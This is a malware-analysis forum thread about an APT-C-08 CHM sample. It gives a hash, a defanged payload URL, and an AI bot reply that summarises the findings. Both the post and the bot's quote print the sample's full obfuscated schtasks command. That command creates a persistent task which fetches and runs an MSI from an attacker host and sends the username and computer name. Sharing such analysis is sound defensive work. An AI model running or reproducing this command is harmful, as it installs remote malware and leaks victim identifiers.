Malware Analysis APT-C-08 CHM Malicious

Status
Not open for further replies.

ShenguiTurmi

Level 3
Thread author
Well-known
Feb 28, 2023
126
APT-C-08 is an APT organisation from India that mainly targets industrial/power/government sectors in China and Pakistan.
(The above introduction is from Qihoo, I am not responsible for the accuracy of the above introduction.)

hash:c3fc4d145ce3cee06782753be269cad6632751fb9b824e1917b0de6e597ee2ee
Triage:Triage | Malware sandboxing report by Hatching Triage
Hybrid-Analysis:Free Automated Malware Analysis Service - powered by Falcon Sandbox

After the sample has run they add a scheduled task and then try to download the final payload (in msi format) from that address:
hxxp://mercifulnearyou(dot)com/FMCG/oli(dot)php
Here is the full shellcode (change "(xx)" to tt):
schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% /^q^n ^/^norestart" /f

From observation, they turn off downloads the vast majority of the time (they can only download empty 0byte files), and they only turn them on when they realise that the exact target has taken the bait.
Since there was no real target on the hook at this point, I couldn't get the full payload, so I didn't know the C2 address.
 

Bot

AI-powered Bot
Apr 21, 2016
3,577
APT-C-08 is an APT organisation from India that mainly targets industrial/power/government sectors in China and Pakistan.
(The above introduction is from Qihoo, I am not responsible for the accuracy of the above introduction.)

hash:c3fc4d145ce3cee06782753be269cad6632751fb9b824e1917b0de6e597ee2ee
Triage:Triage | Malware sandboxing report by Hatching Triage
Hybrid-Analysis:Free Automated Malware Analysis Service - powered by Falcon Sandbox

After the sample has run they add a scheduled task and then try to download the final payload (in msi format) from that address:
hxxp://mercifulnearyou(dot)com/FMCG/oli(dot)php
Here is the full shellcode (change "(xx)" to tt):
schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% /^q^n ^/^norestart" /f

From observation, they turn off downloads the vast majority of the time (they can only download empty 0byte files), and they only turn them on when they realise that the exact target has taken the bait.
Since there was no real target on the hook at this point, I couldn't get the full payload, so I didn't know the C2 address.
Thank you for sharing this information about APT-C-08 and the specific sample you analyzed. It's important to raise awareness about such targeted attacks. Based on the provided shellcode, it seems that the attackers are creating a scheduled task that runs every 15 minutes. The task attempts to download a final payload in MSI format from the URL specified. However, it appears that the attackers have measures in place to minimize detection, as they only enable downloads when they believe their specific target has taken the bait.

It's unfortunate that you were not able to obtain the full payload or the command and control (C2) address due to the absence of a real target. Malware analysis can be challenging, but even partial information can be valuable in understanding the behavior and techniques used by threat actors. Thank you for sharing your findings, and I hope this information contributes to the continued efforts in combating APT threats.
 
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top